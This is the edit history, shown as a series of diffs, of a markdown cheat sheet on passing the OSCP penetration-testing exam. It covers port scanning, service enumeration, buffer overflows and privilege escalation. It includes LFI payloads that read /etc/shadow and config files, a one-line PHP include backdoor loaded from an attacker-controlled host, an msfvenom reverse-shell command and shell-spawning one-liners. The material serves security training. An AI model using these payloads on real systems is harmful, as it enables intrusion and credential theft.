TheVeryAngryUnicorn · June 15, 2020 18:51 · Dec 17, 2016 · Dec 17, 2016 · Dec 17, 2016 · Oct 26, 2016
diff --git a/how-to-oscp-final.md b/how-to-oscp-final.md
@@ -10,7 +10,7 @@
 
 Set a timer for 1hr, repeating. Each time it goes off, stop and evaluate your progress. If you haven't made any progress for 2 hours, move on to the next machine.
 
-**This is important**. Getting stuck due to tunnel vision is extremely common during the exam. This isn't the labs, you don't have time to waste diving down rabbit holes.
+**This is important**. Getting stuck due to tunnel vision is extremely common during the exam. This isn't the labs - you don't have time to waste diving down rabbit holes.
 
 ## Recon
 

diff --git a/how-to-oscp-final.md b/how-to-oscp-final.md
@@ -10,6 +10,8 @@
 
 Set a timer for 1hr, repeating. Each time it goes off, stop and evaluate your progress. If you haven't made any progress for 2 hours, move on to the next machine.
 
+**This is important**. Getting stuck due to tunnel vision is extremely common during the exam. This isn't the labs, you don't have time to waste diving down rabbit holes.
+
 ## Recon
 
 ### DNS

diff --git a/how-to-oscp-final.md b/how-to-oscp-final.md
@@ -194,22 +194,36 @@ Also see: http://netsec.ws/?p=337
 
 ### Linux
 
-- https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
+1. **Check current access first**:
+  - Am I in sudoers?
+  - Do I have sudoedit access to useful files?
+2. Enumerate!
+
+Good resources:
+- http://netsec.ws/?p=309
 - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
+- https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
+- https://www.rebootuser.com/?p=1623
 - https://www.kernel-exploits.com/
+- http://security.stackexchange.com/questions/101715/automatically-enumerate-missing-patches-on-penetration-test
 
-1. **Check current access first**: am I in sudoers?
+If still stuck, try Dirty COW: https://github.com/dirtycow/dirtycow.github.io/wiki
 
 ### Windows
 
+1. **Check current access first**: 
+  - Am I already Administrator? 
+  - Am I in Remote Desktop Users?
+2. Enumerate!
+
+Good resources:
 - http://www.fuzzysecurity.com/tutorials/16.html
 - http://it-ovid.blogspot.com.au/2012/02/windows-privilege-escalation.html?m=1
 - http://www.greyhathacker.net/?p=738
+- https://www.youtube.com/watch?v=kMG8IsCohHA
+- https://www.youtube.com/watch?v=PC_iMqiuIRQ
+
 
-1. **Check current access first**: 
-  - Am I already Administrator? 
-  - Am I in Remote Desktop Users?
-2. Enumerate
 
 
 ## Misc tools

diff --git a/how-to-oscp-final.md b/how-to-oscp-final.md
@@ -196,6 +196,7 @@ Also see: http://netsec.ws/?p=337
 
 - https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
 - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
+- https://www.kernel-exploits.com/
 
 1. **Check current access first**: am I in sudoers?
 

diff --git a/how-to-oscp-final.md b/how-to-oscp-final.md
@@ -194,7 +194,7 @@ Also see: http://netsec.ws/?p=337
 
 ### Linux
 
-- https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List#finding
+- https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
 - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
 
 1. **Check current access first**: am I in sudoers?

diff --git a/how-to-oscp-final.md b/how-to-oscp-final.md
@@ -194,17 +194,22 @@ Also see: http://netsec.ws/?p=337
 
 ### Linux
 
-https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
+- https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List#finding
+- https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
 
+1. **Check current access first**: am I in sudoers?
 
 ### Windows
 
-http://www.fuzzysecurity.com/tutorials/16.html
-http://it-ovid.blogspot.com.au/2012/02/windows-privilege-escalation.html?m=1
+- http://www.fuzzysecurity.com/tutorials/16.html
+- http://it-ovid.blogspot.com.au/2012/02/windows-privilege-escalation.html?m=1
+- http://www.greyhathacker.net/?p=738
 
-1. Check current access first: 
+1. **Check current access first**: 
   - Am I already Administrator? 
   - Am I in Remote Desktop Users?
+2. Enumerate
+
 
 ## Misc tools
 

diff --git a/how-to-oscp-final.md b/how-to-oscp-final.md
@@ -14,14 +14,22 @@ Set a timer for 1hr, repeating. Each time it goes off, stop and evaluate your pr
 
 ### DNS
 
+Reverse lookup of entire provided range:
 
+```
+dig.sh <ips.txt>
 
-Run dark_enum.py
+for ip in $(cat ips.txt); do nslookup $ip <nameserver>; done
+```
 
 ### Port Scans
 
 Run dark_enum.py (unicornscan of full port range)
 
+1. Actually **read** the intensive nmap scan
+2. Actually **read** Nikto/Dirb/nmap NSE script output
+3. Run the port scan again if you think something might have been missed
+
 ## Enumerating 
 
 This is the essential part of penetration. Find out what is available and how you could punch through it with minimum ease.
@@ -175,13 +183,10 @@ Also: ***CHECK VERSIONS*** and `searchsploit`
 
 ## Limited Shells
 
-python -c 'import pty; pty.spawn("/bin/sh")'
-
-echo os.system('/bin/bash')
-
-/bin/sh -i
-
-perl —e 'exec "/bin/sh";'
+- python -c 'import pty; pty.spawn("/bin/sh")'
+- echo os.system('/bin/bash')
+- /bin/sh -i
+- perl —e 'exec "/bin/sh";'
 
 Also see: http://netsec.ws/?p=337
 

diff --git a/how-to-oscp-final.md b/how-to-oscp-final.md
@@ -3,6 +3,7 @@
 1. Recon
 2. Find vuln
 3. Exploit
+4. Escalate
 4. Document it
 
 ## Time yourself
@@ -11,21 +12,15 @@ Set a timer for 1hr, repeating. Each time it goes off, stop and evaluate your pr
 
 ## Recon
 
-Unicornscans in cli, nmap in msfconsole to help store loot in database.
+### DNS
 
-### TCP
 
-```
-unicornscan -i tap0 -I -mT $IP:a
-db_nmap -e tap0 -n -v -Pn -sV -sC --version-light -A -p
-```
 
-### UDP 
+Run dark_enum.py
 
-```
-unicornscan -i tap0 -I -mU $IP:a
-db_nmap -e tap0 -n -v -Pn -sV -sC --version-light -A -sU -p
-```
+### Port Scans
+
+Run dark_enum.py (unicornscan of full port range)
 
 ## Enumerating 
 
@@ -178,6 +173,34 @@ Also: ***CHECK VERSIONS*** and `searchsploit`
   - Make sure it fits your payload length above
 6. Gain shell, local priv esc or rooted already?
 
+## Limited Shells
+
+python -c 'import pty; pty.spawn("/bin/sh")'
+
+echo os.system('/bin/bash')
+
+/bin/sh -i
+
+perl —e 'exec "/bin/sh";'
+
+Also see: http://netsec.ws/?p=337
+
+## Privilege Escalation
+
+### Linux
+
+https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
+
+
+### Windows
+
+http://www.fuzzysecurity.com/tutorials/16.html
+http://it-ovid.blogspot.com.au/2012/02/windows-privilege-escalation.html?m=1
+
+1. Check current access first: 
+  - Am I already Administrator? 
+  - Am I in Remote Desktop Users?
+
 ## Misc tools
 
 - `cewl` for crawling a site for bruteforcing user/password

diff --git a/how-to-oscp-final.md b/how-to-oscp-final.md
@@ -5,6 +5,10 @@
 3. Exploit
 4. Document it
 
+## Time yourself
+
+Set a timer for 1hr, repeating. Each time it goes off, stop and evaluate your progress. If you haven't made any progress for 2 hours, move on to the next machine.
+
 ## Recon
 
 Unicornscans in cli, nmap in msfconsole to help store loot in database.

diff --git a/how-to-oscp-final.md b/how-to-oscp-final.md
@@ -0,0 +1,181 @@
+# How to pass the OSCP
+
+1. Recon
+2. Find vuln
+3. Exploit
+4. Document it
+
+## Recon
+
+Unicornscans in cli, nmap in msfconsole to help store loot in database.
+
+### TCP
+
+```
+unicornscan -i tap0 -I -mT $IP:a
+db_nmap -e tap0 -n -v -Pn -sV -sC --version-light -A -p
+```
+
+### UDP 
+
+```
+unicornscan -i tap0 -I -mU $IP:a
+db_nmap -e tap0 -n -v -Pn -sV -sC --version-light -A -sU -p
+```
+
+## Enumerating 
+
+This is the essential part of penetration. Find out what is available and how you could punch through it with minimum ease.
+
+DO NOT SKIP STEPS.
+
+DO NOT PASS GO.
+
+SEARCH ***ALL*** THE VERSIONS WITH `searchsploit` 
+(or google -> `site:exploit-db.com APP VERSION`)
+
+
+### HTTP - 80, 8080, 8000
+
+```
+curl -i ${IP}/robots.txt
+```
+
+Note down Server and other module versions.
+
+searchsploit them ALL.
+
+Visit all URLs from robots.txt.
+
+```
+nikto -host $IP
+```
+
+```
+gobuster -u http://$IP -w /usr/share/seclists/Discovery/Web_Content/Top1000-RobotsDisallowed.txt
+
+gobuster -u http://$IP -w /usr/share/seclists/Discovery/Web_Content/common.txt
+```
+
+if nothing, find more web word lists.
+
+*Browse the site* but keep an eye on the burp window / source code / cookies etc.
+
+Things to be on look for:
+
+- Default credentials for software
+- SQL-injectable GET/POST params
+- LFI/RFI through ?page=foo type params
+- LFI:
+  - `/etc/passwd` | `/etc/shadow` insta-win
+  - `/var/www/html/config.php` or similar paths to get SQL etc creds
+  - `?page=php://filter/convert.base64-encode/resource=../config.php`
+  - `../../../../../boot.ini` to find out windows version
+- RFI:
+  - Have your PHP/cgi downloader ready
+  - `<?php include $_GET['inc']; ?>` simplest backdoor to keep it dynamic without anything messing your output
+  - Then you can just `http://$IP/inc.php?inc=http://$YOURIP/bg.php` and have full control with minimal footprint on target machine
+  - get `phpinfo()`
+
+
+### HTTPS - 443
+
+Heartbleed / CRIME / Other similar attacks
+
+Read the actual SSL CERT to:
+
+- find out potential correct vhost to GET
+- is the clock skewed
+- any names that could be usernames for bruteforce/guessing.
+
+### FTP - 21
+
+- Anonymous login
+- Enumerate the hell out of the machine!
+  - OS version
+  - Other software you can find on the machine (Prog Files, yum.log, /bin)
+  - password files
+  - DLLs for `msfpescan` / BOF targets
+- Do you have UPLOAD potential?
+  - Can you trigger execution of uploads?
+  - Swap binaries?
+- Vulnerabilities in version / RCE / #WINNING?-D
+
+### SMB - 139, 445
+
+```
+enum4linux -a $IP
+```
+
+Read through the report and search for versions of things => `searchsploit`
+
+```
+smbclient -L $IP
+```
+
+Mount shares
+
+```
+mount -t cifs -o user=USERNAME,sec=ntlm,dir_mode=0077 "//10.10.10.10/My Share" /mnt/cifs
+```
+
+Can you access shares?
+
+- Directly exploitable MSxx-xxx versions?
+  - Worth burning MSF strike?
+
+
+### SNMP - UDP 169
+
+- Try to enumerate windows shares / network info
+
+Quick test of communities:
+
+```
+onesixtyone
+```
+
+Full discovery of everything you can:
+
+```
+snmp-check
+```
+
+
+### TFTP - UDP 69
+
+- Read / Write access?
+  - Pretty much same things as FTP
+
+### SSH - 22
+
+Unless you get a MOTD or a broken sshd version, you are SOOL and this is likely just a secondary access point once you break something else.
+
+### Email - 25, 110/995 or 143/993
+
+SMTP, POP3(s) and IMAP(s) are good for enumerating users.
+
+Also: ***CHECK VERSIONS*** and `searchsploit`
+
+
+## Buffer Overflow
+
+1. Determine length of overflow trigger w/ binary search "A"x1000
+2. Determine exact EIP with `pattern_create.rb` & `pattern_offset.rb`
+3. Determine badchars to make sure all of your payload is getting through
+4. Develop exploit
+  - Is the payload right at ESP 
+    - `JMP ESP`
+  - Is the payload before ESP 
+    - `sub ESP, 200` and then `JMP ESP`
+    - or
+    - `call [ESP-200]`
+5. `msfvenom -a x86 --platform windows/linux -p something/shell/reverse_tcp lhost=x.x.x.x lport=53 -f exe/elf/python/perl/php -o filename`
+  - Make sure it fits your payload length above
+6. Gain shell, local priv esc or rooted already?
+
+## Misc tools
+
+- `cewl` for crawling a site for bruteforcing user/password
+- don't forget about `nmap` scripts!
+  - e.g. `--script smtp-commands` or `--script auth-owners`
No results found